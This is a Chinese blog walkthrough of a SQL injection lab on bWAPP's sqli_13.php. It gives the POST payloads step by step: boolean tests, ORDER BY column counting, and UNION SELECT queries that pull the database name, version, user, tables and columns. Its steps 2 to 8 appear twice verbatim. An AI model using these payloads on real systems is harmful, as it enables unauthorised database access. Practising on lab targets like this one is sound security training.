SQL注入之bWAPP之sqli_13.php
2018-03-28 18:40
344 查看
1、还是老样子查看POST参数然后构造,结果如图:
2、在hackbar的POST框中输入“movie=1'”,报错中包含三个单引号,说明应该是数字型注入,结果如图:
3、输入“movie=1 and 1=1”正常,输入“movie=1 and 1=2”报错,结果如下图:
所以该处存在数字型注入点
4、判断字段数:
输入“movie=1 order by 7”正常,输入“movie=1 order by 8”报错,说明字段数为7,结果如图:
查看显示位置,输入“movie=-1 union select 1,2,3,4,5,6,7”,结果如图:
5、查询数据库等信息:
输入“movie=-1 union select 1,database(),version(),4,user(),6,7”,查看数据库名、数据库版本、当前用户,结果如图:
6、查询表名:
输入“movie=-1 union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema='bwapp'”,表名为blog,结果如图:
7、查询字段名:
输入“movie=-1 union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name='blog'”,字段名为id,结果如图:
8、查询字段内容:
输入“movie=-1 union select 1,database(),version(),id,user(),6,7 from blog”,字段无内容。
2、在hackbar的POST框中输入“movie=1'”,报错中包含三个单引号,说明应该是数字型注入,结果如图:
3、输入“movie=1 and 1=1”正常,输入“movie=1 and 1=2”报错,结果如下图:
所以该处存在数字型注入点
4、判断字段数:
输入“movie=1 order by 7”正常,输入“movie=1 order by 8”报错,说明字段数为7,结果如图:
查看显示位置,输入“movie=-1 union select 1,2,3,4,5,6,7”,结果如图:
5、查询数据库等信息:
输入“movie=-1 union select 1,database(),version(),4,user(),6,7”,查看数据库名、数据库版本、当前用户,结果如图:
6、查询表名:
输入“movie=-1 union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema='bwapp'”,表名为blog,结果如图:
7、查询字段名:
输入“movie=-1 union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name='blog'”,字段名为id,结果如图:
8、查询字段内容:
输入“movie=-1 union select 1,database(),version(),id,user(),6,7 from blog”,字段无内容。
相关文章推荐
- SQL注入之bWAPP之sqli_16.php
- SQL注入之bWAPP之sqli_3.php
- SQL注入之bWAPP之sqli_11.php
- SQL注入之bWAPP之manual_interv.php
- SQL注入之bWAPP之sqli_6.php
- SQL注入之bWAPP之sqli_1.php
- SQL注入之bWAPP之sqli_10-1.php
- APP安全之SQL注入之什么是SQL注入(一)
- SQL注入之bWAPP之sqli_2.php
- SQL手工注入的学习总结
- SQL 注入视频讲解
- php操作mysql防止sql注入
- SQL 注入有常用语句
- SQL注入专题
- sqlSessionFactory无法注入,报Property 'sqlSessionFactory' or 'sqlSessionTemplate' are required
- 警惕采用编码过的SQL恶意注入
- 如何测试WEB应用程序防止SQL注入***
- SQL注入相关的命令整理一
- SQL注入初了解
- SQL 注入 及SQLIer、SQLmap